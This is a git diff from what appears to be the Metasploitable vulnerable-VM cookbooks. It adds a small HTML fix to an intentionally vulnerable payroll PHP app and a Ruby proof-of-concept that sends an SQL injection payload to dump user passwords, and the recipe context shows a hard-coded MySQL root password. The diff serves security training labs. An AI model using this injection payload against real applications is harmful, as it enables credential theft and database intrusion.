diff --git a/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php b/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
index ee8a8f7..7e05f68 100644
--- a/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
+++ b/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
@@ -38,6 +38,7 @@ if($_POST['s']){
                     foreach ($keys as $key) {
                         echo "<td>" . $row[$key] . "</td>";
                     }
+                    echo "</tr>\n";
                 }
                 $result->free();
             }
diff --git a/chef/cookbooks/metasploitable/files/payroll_app/poc.rb b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
new file mode 100644
index 0000000..48452b6
--- /dev/null
+++ b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
@@ -0,0 +1,14 @@
+require 'net/http'
+
+url  = "http://127.0.0.1/payroll_app.php"
+uri  = URI(url)
+user = 'luke_skywalker'
+injection = "password'; select password from users where username='' OR ''='"
+
+puts "Making POST request to #{uri} with the following parameters:"
+puts "'user' = #{user}"
+puts "'password' = #{injection}"
+res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
+
+puts "Response body is #{res.body}"
+puts "Done"
diff --git a/chef/cookbooks/metasploitable/recipes/payroll_app.rb b/chef/cookbooks/metasploitable/recipes/payroll_app.rb
index 9e8f97a..94d8d2d 100644
--- a/chef/cookbooks/metasploitable/recipes/payroll_app.rb
+++ b/chef/cookbooks/metasploitable/recipes/payroll_app.rb
@@ -13,6 +13,17 @@ cookbook_file '/tmp/payroll.sql' do
   mode '0755'
 end
 
+directory '/home/vagrant/poc/payroll_app/' do
+  mode '0755'
+  owner 'vagrant'
+  recursive true
+end
+
+cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
+  source 'payroll_app/poc.rb'
+  mode '0755'
+end
+
 bash 'create payroll database and import data' do
   code <<-EOH
     mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"